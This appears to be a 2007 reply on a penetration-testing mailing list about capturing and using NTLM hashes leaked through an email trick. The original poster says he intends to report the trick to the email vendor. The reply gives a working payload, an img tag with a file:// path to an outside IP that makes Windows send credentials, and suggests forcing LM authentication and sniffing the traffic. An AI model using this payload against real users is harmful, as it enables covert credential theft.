Send the hash to a machine that is only capable of LM authentication and
then sniff that traffic. I've done that with an embedded image tag in
an e-mail like <img src="file://123.123.123.123/someshare/dot.gif"> or
something like that.
-----Original Message-----
From: listbounce@securityfocus.com [mailto:listbounce@securityfocus.com]
On Behalf Of me
Sent: Thursday, November 15, 2007 5:15 PM
To: pen-test@securityfocus.com
Subject: Pass the hash
I have an email hack that sends the Windows
credentials, without the user's knowledge or consent,
to my box - which is running CAIN.
No machine in my shop will send (downgrade
authentication) LM or NTLMv1 -- only NTLMv2 -- which
is NTLMSSP . Using CAIN I can get the suite of NTLMSSP
hashes but I cannot pass them on or crack them via
brute force. Since these hashes are not the same as
the hashes from the SAM - I cannot pass them directly
to a RAINBOW NTLM table attack.
Before I turn over the email hack to the email vendor,
I would like very much to have a POC that either
passes the hash or a better cracker than using a
dictionary.
It seems to me that the only viable hack is to somehow
create a MITM situation where the authentication from
my email hack is used to access some network resource
(share) on a target machine where I know the email
victim can access the resource via these credentials.
I am hoping Metasploit or CAIN will do this one day
and I know that Metasploit will pass the hash when it
is not an NTLMv2 hash.
Any other ideas that will leverage the hashes that I
can gather - I have gathered my own hashes and
verified that a CAIN dictionary attack will accurately
match up a password to a hash (in other words the CAIN
dictionary cracker works fine). I think that by using
a very large dictionary and using all of the CAIN
dictionary options I could probably crack 2-3
passwords from 200 hashes.
thanks
________________________________________________________________________
____________
Be a better sports nut! Let your teams follow you
with Yahoo Mobile. Try it now.
http://mobile.yahoo.com/sports;_ylt=At9_qDKvtAbMuh1G1SQtBI7ntAcJ
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
**DISCLAIMER
This e-mail message and any files transmitted with it are intended for the use
of the individual or entity to which they are addressed and may contain
information that is privileged, proprietary and confidential. If you are not
the intended recipient, you may not use, copy or disclose to anyone the message
or any information contained in the message. If you have received this
communication in error, please notify the sender and delete this e-mail
message. The contents do not represent the opinion of D&E except to the extent
that it relates to their official business.
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
